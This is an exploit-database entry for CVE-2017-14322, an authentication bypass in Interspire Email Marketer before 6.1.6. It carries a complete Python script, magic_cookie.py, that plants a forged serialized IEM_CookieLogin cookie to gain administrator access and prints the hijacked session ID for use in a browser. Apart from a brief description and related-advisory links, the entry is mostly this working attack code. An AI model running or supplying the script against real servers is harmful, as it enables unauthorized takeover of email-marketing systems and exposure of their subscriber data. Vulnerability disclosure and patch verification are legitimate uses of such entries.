Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtDevcoin1337DAY-ID-30224
HistoryApr 22, 2018 - 12:00 a.m.

Interspire Email Marketer - Remote Admin Authentication Bypass Exploit

2018-04-2200:00:00
devcoin
0day.today
168

0.208 Low

EPSS

Percentile

96.4%

JSON

The function in charge of checking whether the user is already logged in init.php in Interspire Email Marketer (IEM) prior to 6.1.6 allows remote attackers to bypass authentication and obtain administrative access by using the IEM_CookieLogin cookie with a specially crafted value. On top of that, if the customer doesn’t have an annuel maintenance plan, the application says that it’s on the last available version and there is no update.
The vulnerabilities were found during an incident response on a compromise instance of the application.
Proof of Concept:
Details provided here : https://security.infoteam.ch/en/blog/posts/narrative-of-an-incident-response-from-compromise-to-the-publication-of-the-weakness.html#### Usage Info
python magic_cookie.py url

import requests
import sys


def cookie_cutter(url):
    with requests.Session() as s:
       s.get(url)
       r = s.get(url)
       response_regex = r.text
       print("requesting initial Cookie\n")
       print(str(r.headers)+"\n")
       
       for key,value in s.cookies.items():
           if "IEMSESSIONID" in key:
              print "Key:"+key +",Value:" + value
              print "-" * 25
              print "forging Admin cookie"+"\n"
              print "-" * 25
              
              s.cookies.set('IEM_CookieLogin', "YTo0OntzOjQ6InVzZXIiO3M6MToiMSI7czo0OiJ0aW1lIjtpOjE1MDU0NzcyOTQ7czo0OiJyYW5kIjtiOjE7czo4OiJ0YWtlbWV0byI7czo5OiJpbmRleC5waHAiO30%3D")
       for key,value in s.cookies.items():
            print "Key:"+key +",Value:" + value
            print "-" * 25
            if "IEMSESSIONID" in key:
                session_rider = value
       print "Making 2nd request with Forged Cookie\n"
       print "-" * 25
       r = s.get(url)
       response_regex2 = r.text

       if response_regex != response_regex2:
          print "Response Headers"+"\n"
          print "-" * 25
          print(str(r.headers)+"\n")
          print "-" * 25
          print "Response Status Code"+"\n"
          print str(r.status_code)+"\n"
          print "-" * 25
          print response_regex2+"\n"
          print "-" * 25
    return session_rider      


def main():
    url = sys.argv[1]
    print url
    session_rider_value = cookie_cutter(url)
    print "Magic Cookie Generated Modify Existing IEMSESSIONID Value In browser With Below Value "
    print "-" * 25
    print session_rider_value +"\n"
    print "-" * 25

main()


#  0day.today [2018-04-23]  #

Related

prion 1
nvd 1
openvas 1
zdt 1
exploitpack 1
cve 1
cvelist 1
packetstorm 1
exploitdb 1
prion
prion
Authentication flaw
2017-10-18 18:29:00
nvd
nvd
CVE-2017-14322
2017-10-18 18:29:00
openvas
openvas
Interspire IEM Remote Authentication Admin Bypass Vulnerability
2017-10-19 00:00:00
zdt
zdt
Interspire Email Marketer Authentication Bypass Vulnerability
2017-10-18 00:00:00
exploitpack
exploitpack
Interspire Email Marketer 6.1.6 - Remote Admin Authentication Bypass
2018-04-24 00:00:00
cve
cve
CVE-2017-14322
2017-10-18 18:29:00
cvelist
cvelist
CVE-2017-14322
2017-10-18 18:00:00
packetstorm
packetstorm
Interspire Email Marketer Administrative Authentication Bypass
2018-04-25 00:00:00
exploitdb
exploitdb
Interspire Email Marketer < 6.1.6 - Remote Admin Authentication Bypass
2018-04-24 00:00:00

0.208 Low

EPSS

Percentile

96.4%

JSON
Related for 1337DAY-ID-30224
prion1nvd1openvas1zdt1exploitpack1cve1cvelist1packetstorm1exploitdb1